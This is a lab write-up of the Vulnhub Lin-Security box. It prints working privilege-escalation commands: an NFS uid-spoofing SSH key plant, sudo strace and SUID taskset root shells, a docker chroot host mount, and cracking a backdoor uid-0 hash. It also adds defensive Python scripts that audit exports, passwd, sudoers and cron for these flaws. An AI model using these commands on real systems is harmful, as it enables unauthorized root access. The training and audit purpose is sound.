Vulnhub-Lin-Security

Target VM download link

0x01 Information gathering

nmap scan

$ nmap -p- 192.168.56.7 -T5 -sC -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-12 07:39 EDT
Nmap scan report for 192.168.56.7
Host is up (0.0019s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
| 256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
|_ 256 b9:15:59:78:85:78:9e:a5:e6:16:f6:cf:96:2d:1d:36 (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35075/tcp mountd
| 100005 1,2,3 39585/tcp6 mountd
| 100005 1,2,3 40841/udp mountd
| 100005 1,2,3 57399/udp6 mountd
| 100021 1,3,4 37289/tcp6 nlockmgr
| 100021 1,3,4 39940/udp6 nlockmgr
| 100021 1,3,4 46833/tcp nlockmgr
| 100021 1,3,4 51407/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
35075/tcp open mountd 1-3 (RPC #100005)
41139/tcp open mountd 1-3 (RPC #100005)
46833/tcp open nlockmgr 1-4 (RPC #100021)
58497/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.72 seconds

NFS enumeration

nmap -p 111 --script=nfs* 192.168.56.7
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-12 07:40 EDT
Nmap scan report for 192.168.56.7
Host is up (0.00092s latency).

PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /home/peter *

Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds

0x02 Exploitation

Walkthrough-1

The first thing I went after here was the NFS misconfiguration: the share is exported to every host, so any client that creates a local user with peter's uid can write into peter's home directory, including .ssh/authorized_keys.

mkdir ~/home
sudo mount -o nolock 192.168.56.7:/home/ /home/kali/home/
sudo groupadd -g 1005 peter
sudo adduser peter --uid 1001 --gid 1005

su peter
ssh-keygen
cat ~/.ssh/id_rsa.pub > /home/kali/home/peter/.ssh/authorized_keys
ssh peter@192.168.56.7
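
The misconfiguration above is visible from the NFS server's own export list. The following audit script is an added example written for this post, not part of the original writeup or the box; it parses an /etc/exports file in the exports(5) format and nmap's nfs-showmount output, and flags the three properties the walkthrough relied on: a wildcard client list, rw access, and uid-based (AUTH_SYS) trust without all_squash or Kerberos. The sample exports file and the nmap excerpt are constructed for the example; only the /home/peter line mirrors what the scan above reported.

```python
import re

# Constructed sample /etc/exports in the exports(5) format (assumed format;
# not taken from the box). The first entry is what the writeup's
# "nfs-showmount: /home/peter *" result implies.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/home/peter   *(rw,sync,no_root_squash,no_subtree_check)
/srv/share    10.0.0.0/24(ro,sync,root_squash)
/srv/backup   backup.example.internal(rw,sync,root_squash)   # constructed
"""

# Constructed excerpt in the shape of the nmap nfs-showmount output above.
SAMPLE_NMAP = """\
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /home/peter *
"""

# client(opt,opt) or a bare client with no option list
CLIENT_RE = re.compile(r'(\S+?)\(([^)]*)\)|(\S+)')
# '| /path clients' or '|_ /path clients' as printed by nmap's nfs-showmount
SHOWMOUNT_RE = re.compile(r'^\|_?\s+(/\S*)\s+(\S.*)$')


def parse_exports(text):
    """Return [(path, [(client, set(options)), ...]), ...] from exports(5) text."""
    exports = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else '')
        clients = []
        for m in CLIENT_RE.finditer(rest):
            if m.group(3) is not None:            # bare client, default options
                clients.append((m.group(3), set()))
            else:
                opts = {o.strip() for o in m.group(2).split(',') if o.strip()}
                clients.append((m.group(1), opts))
        exports.append((path, clients))
    return exports


def audit_exports(text):
    """Return findings for export lines that allow the walkthrough's attack."""
    findings = []
    for path, clients in parse_exports(text):
        if not clients:
            findings.append(f"{path}: no client list (exported to everyone)")
        for client, opts in clients:
            anyone = client == '*' or any(ch in client for ch in '*?')
            writable = 'rw' in opts               # exports are read-only by default
            if anyone and writable:
                findings.append(f"{path}: writable by any client ({client})")
            elif anyone:
                findings.append(f"{path}: readable by any client ({client})")
            if 'no_root_squash' in opts:
                findings.append(f"{path}: no_root_squash for {client} "
                                "(client root is server root)")
            krb = any(o.startswith('sec=') and 'krb' in o for o in opts)
            if writable and 'all_squash' not in opts and not krb:
                findings.append(f"{path}: rw with AUTH_SYS uid trust for {client} "
                                "(a client that controls its own uids writes as any user)")
    return findings


def audit_showmount(nmap_text):
    """Flag wildcard client lists in nmap nfs-showmount output."""
    findings = []
    for line in nmap_text.splitlines():
        m = SHOWMOUNT_RE.match(line.strip())
        if m and '*' in m.group(2):
            findings.append(f"{m.group(1)}: exported to any client per showmount")
    return findings


if __name__ == '__main__':
    for finding in audit_exports(SAMPLE_EXPORTS) + audit_showmount(SAMPLE_NMAP):
        print(finding)
```

The third check is the important one for this box: root_squash alone does nothing here, because the attacker never needed root on the client, only a local uid equal to peter's. Restricting the client list, or using all_squash / sec=krb5 on home-directory exports, is what actually closes it.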

Privilege escalation 1

peter@linsecurity:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User peter may run the following commands on linsecurity:
(ALL) NOPASSWD: /usr/bin/strace

peter@linsecurity:~$ sudo strace -o /dev/null /bin/sh
#id
uid=0(root) gid=0(root) groups=0(root)
#

Privilege escalation 2

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
cat /etc/passwd

Because the host's / is mounted at /mnt and we chroot into it, the /etc/passwd seen inside the container is the host's /etc/passwd, so a user can be appended to it directly to escalate.

Privilege escalation 3

The /etc/passwd read above contains a backdoor user:

insecurity:AzER3pBZh6WZE:0:0::/:/bin/sh
username:password-hash:uid:gid:gecos:home:shell

The password field holds a crypt hash that can be cracked with John the Ripper (JTR); log in with the recovered password. Because the uid is 0, that login is root.
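
Both properties of that line (a second uid-0 account, and a hash sitting in world-readable /etc/passwd rather than /etc/shadow) are easy to check for automatically. The script below is an added example for this post, not from the original writeup; the /etc/passwd sample is constructed, with only the insecurity line taken from the box and peter's uid/gid matching the values used earlier.

```python
# Constructed /etc/passwd sample. The 'insecurity' line is the one shown in
# the writeup; the other entries are made up for the example.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
peter:x:1001:1005:Peter,,,:/home/peter:/bin/bash
bob:x:1002:1006:Bob,,,:/home/bob:/bin/bash
insecurity:AzER3pBZh6WZE:0:0::/:/bin/sh
guest::1003:1003::/home/guest:/bin/sh
"""

FIELDS = ('name', 'password', 'uid', 'gid', 'gecos', 'home', 'shell')


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed lines are reported, not skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.startswith('#'):
            continue
        fields = raw.split(':')
        if len(fields) != 7:
            entries.append({'name': raw,
                            'error': f'line {lineno}: expected 7 fields, got {len(fields)}'})
            continue
        entry = dict(zip(FIELDS, fields))
        entry['line'] = lineno
        entries.append(entry)
    return entries


def hash_type(field):
    """Rough classification of a crypt(3) string found in the password field."""
    if field in ('x', '*', '!', '!!') or field.startswith('!'):
        return None                      # shadowed or locked: nothing to crack here
    if field == '':
        return 'empty'
    if field.startswith('$6$'):
        return 'sha512crypt'
    if field.startswith('$5$'):
        return 'sha256crypt'
    if field.startswith('$1$'):
        return 'md5crypt'
    if field.startswith('$y$'):
        return 'yescrypt'
    if len(field) == 13 and '$' not in field:
        return 'traditional DES crypt'   # 2-char salt + 11 chars, max 8-char password
    return 'unknown'


def audit_passwd(text):
    """Flag extra uid-0 accounts, hashes in /etc/passwd, and empty passwords."""
    findings = []
    for e in parse_passwd(text):
        if 'error' in e:
            findings.append(e['error'])
            continue
        uid = int(e['uid']) if e['uid'].isdigit() else None
        if uid == 0 and e['name'] != 'root':
            findings.append(f"{e['name']}: extra uid 0 account (line {e['line']})")
        kind = hash_type(e['password'])
        if kind == 'empty':
            findings.append(f"{e['name']}: empty password field, logs in without a password")
        elif kind is not None:
            findings.append(f"{e['name']}: {kind} hash stored in world-readable "
                            "/etc/passwd instead of /etc/shadow")
        if uid is None:
            findings.append(f"{e['name']}: non-numeric uid {e['uid']!r}")
    return findings


if __name__ == '__main__':
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

The 13-character form is the old DES-based crypt, which truncates passwords to 8 characters and cracks quickly; the same script will also catch a modern $6$ hash placed in /etc/passwd, since the point is where the hash lives, not how strong it is.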

Privilege escalation 4

find / -type f -perm -u=s 2>/dev/null

/bin/ping
/bin/fusermount
/bin/umount
/bin/ntfs-3g
/bin/su
/bin/mount
/usr/bin/pkexec
/usr/bin/netkit-rlogin
/usr/bin/xxd
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/netkit-rcp
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/netkit-rsh
/usr/bin/taskset
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/sbin/mount.nfs

Run (taskset is SUID root here, and sh -p keeps the elevated effective uid):

taskset 1 /bin/sh -p

Privilege escalation 5

As user bob:

bob@linsecurity:/home/peter$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on linsecurity:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on linsecurity:
(ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat,
/usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp

Every one of these is a privilege-escalation path.
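
Both sudo listings in this writeup (peter's NOPASSWD strace rule and bob's list of shells and editors) fail the same audit: the granted command can run arbitrary code as the target user, so the rule is equivalent to (ALL) ALL. The script below is an added example for this post, not from the original writeup; it parses sudo -l output, including sudo's wrapped continuation lines, and flags such rules. The sample output is constructed in the shape of the two listings above, and the /usr/sbin/service rule is made up to show a rule that passes. The set of flagged binaries is taken from the commands this writeup shows.

```python
import re

# Constructed 'sudo -l' output in the shape of the two listings above; the
# /usr/sbin/service rule is made up to show one that passes the check.
SAMPLE_SUDO_L = r"""Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /usr/bin/curl, /usr/bin/find,
        /usr/bin/ssh, /usr/bin/vi, /usr/bin/perl, /usr/bin/git
    (ALL) NOPASSWD: /usr/bin/strace
    (root) NOPASSWD: /usr/sbin/service apache2 restart
"""

# Binaries from this writeup's listings that give the caller a shell, run
# arbitrary code, or read/write arbitrary files when executed through sudo.
SHELL_CAPABLE = {
    'ash', 'awk', 'bash', 'sh', 'csh', 'curl', 'dash', 'ed', 'env', 'expect',
    'find', 'ftp', 'less', 'man', 'more', 'scp', 'socat', 'ssh', 'vi', 'zsh',
    'pico', 'rvim', 'perl', 'tclsh', 'git', 'script', 'strace',
}

# "(runas) TAG: TAG: command, command"
RULE_RE = re.compile(r'^\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.*)$')


def parse_sudo_l(text):
    """Return [{'runas', 'tags', 'commands'}] from 'sudo -l' output.

    Indented lines that do not start with '(' are continuation lines, which is
    how sudo wraps long command lists; they are appended to the previous rule."""
    rules, current, in_rules = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith('User ') and 'may run the following commands' in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if m:
            current = {'runas': m.group(1),
                       'tags': [t.rstrip(':') for t in m.group(2).split()],
                       'commands': []}
            rules.append(current)
            cmd_text = m.group(3)
        elif current is not None:
            cmd_text = line
        else:
            continue
        current['commands'].extend(c.strip() for c in cmd_text.split(',') if c.strip())
    return rules


def audit_sudo_rules(text):
    """Flag rules that are equivalent to granting a shell as the run-as user."""
    findings = []
    for rule in parse_sudo_l(text):
        nopw = ' without a password' if 'NOPASSWD' in rule['tags'] else ''
        for cmd in rule['commands']:
            binary = cmd.split()[0].rsplit('/', 1)[-1]
            if cmd == 'ALL':
                findings.append(f"ALL as ({rule['runas']}){nopw}: unrestricted")
            elif binary in SHELL_CAPABLE:
                findings.append(f"{cmd} as ({rule['runas']}){nopw}: "
                                "can run arbitrary commands as the target user")
    return findings


if __name__ == '__main__':
    for finding in audit_sudo_rules(SAMPLE_SUDO_L):
        print(finding)
```

The fix on the sudoers side is to grant specific, non-interactive commands with fixed arguments (as the service rule does) rather than interpreters, editors, pagers or debuggers, whatever the intended use was.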

Privilege escalation 6

cat /etc/crontab

*/1 * * * * root /etc/cron.daily/backup

#!/bin/bash
for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done

This root cron job runs tar on a shell wildcard inside each user's home directory, so privilege escalation via tar wildcard injection is possible here.
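
The condition that makes this job exploitable (a root job that cd's into a user-writable directory and lets the shell expand * into tar's argument list) can be checked for directly, and the fix is to stop passing a wildcard at all. The script below is an added example for this post, not from the original writeup; the crontab sample is constructed, with only the backup line taken from the box, and the hardened script is an assumed rewrite rather than anything the box ships.

```python
import re

# Constructed /etc/crontab in the system crontab format (minute hour dom mon
# dow user command). The backup line is the one the writeup shows.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/1 * * * * root /etc/cron.daily/backup
"""

# The backup script as shown in the writeup.
VULNERABLE_SCRIPT = """\
#!/bin/bash
for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done
"""

# Assumed rewrite (not from the box): tar is pointed at the directory with -C
# and archives '.', so nothing inside the user-writable home directory is ever
# expanded into tar's argument list.
HARDENED_SCRIPT = """\
#!/bin/bash
for d in /home/*/; do
    i=$(basename "$d")
    /bin/tar -zcf "/etc/backups/home-$i.tgz" -C "/home/$i" .
done
"""

GLOB_CHARS = set('*?[')
SEGMENT_SPLIT = re.compile(r'&&|\|\||;|\|')     # simple command separators


def parse_system_crontab(text):
    """Return [(schedule, user, command)] from /etc/crontab-style text."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#') or re.match(r'^\w+=', line):
            continue                       # comment or VAR=value line
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        jobs.append((' '.join(fields[:5]), fields[5], fields[6]))
    return jobs


def tar_wildcard_findings(script_text):
    """Find tar invocations whose argument list contains an unquoted shell glob."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        if line.lstrip().startswith('#'):
            continue
        for segment in SEGMENT_SPLIT.split(line):
            tokens = segment.split()
            if not tokens or tokens[0].rsplit('/', 1)[-1] != 'tar':
                continue
            for tok in tokens[1:]:
                if tok[0] in '\'"':
                    continue               # quoted: the shell will not expand it
                if GLOB_CHARS & set(tok):
                    findings.append(
                        f"line {lineno}: tar argument {tok!r} is expanded by the shell, "
                        "so a file name in that directory beginning with '-' becomes a tar option")
    return findings


def audit_cron(crontab_text, scripts):
    """Cross-check root cron jobs against the scripts they run.

    `scripts` maps a command path to that script's text (what you would read
    off disk on the host)."""
    findings = []
    for schedule, user, command in parse_system_crontab(crontab_text):
        path = command.split()[0]
        if user != 'root' or path not in scripts:
            continue
        body = scripts[path]
        if re.search(r'\bcd\s+/home', body):
            findings.append(f"{path} ({schedule}): root job changes into a user-writable "
                            "directory under /home")
        for f in tar_wildcard_findings(body):
            findings.append(f"{path} ({schedule}): {f}")
    return findings


if __name__ == '__main__':
    for finding in audit_cron(SAMPLE_CRONTAB, {'/etc/cron.daily/backup': VULNERABLE_SCRIPT}):
        print(finding)
```

Running the same audit over HARDENED_SCRIPT returns nothing: with -C dir . the only member name tar receives is ".", so the contents of the home directory cannot influence its command line, and the backup still covers the same files.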

0x03 Summary

What this box helped me with most was reproducing the writable NFS share vulnerability. Everything else felt like things I had done before, though there are other privilege escalation paths I did not reproduce one by one. It is very much aimed at beginners.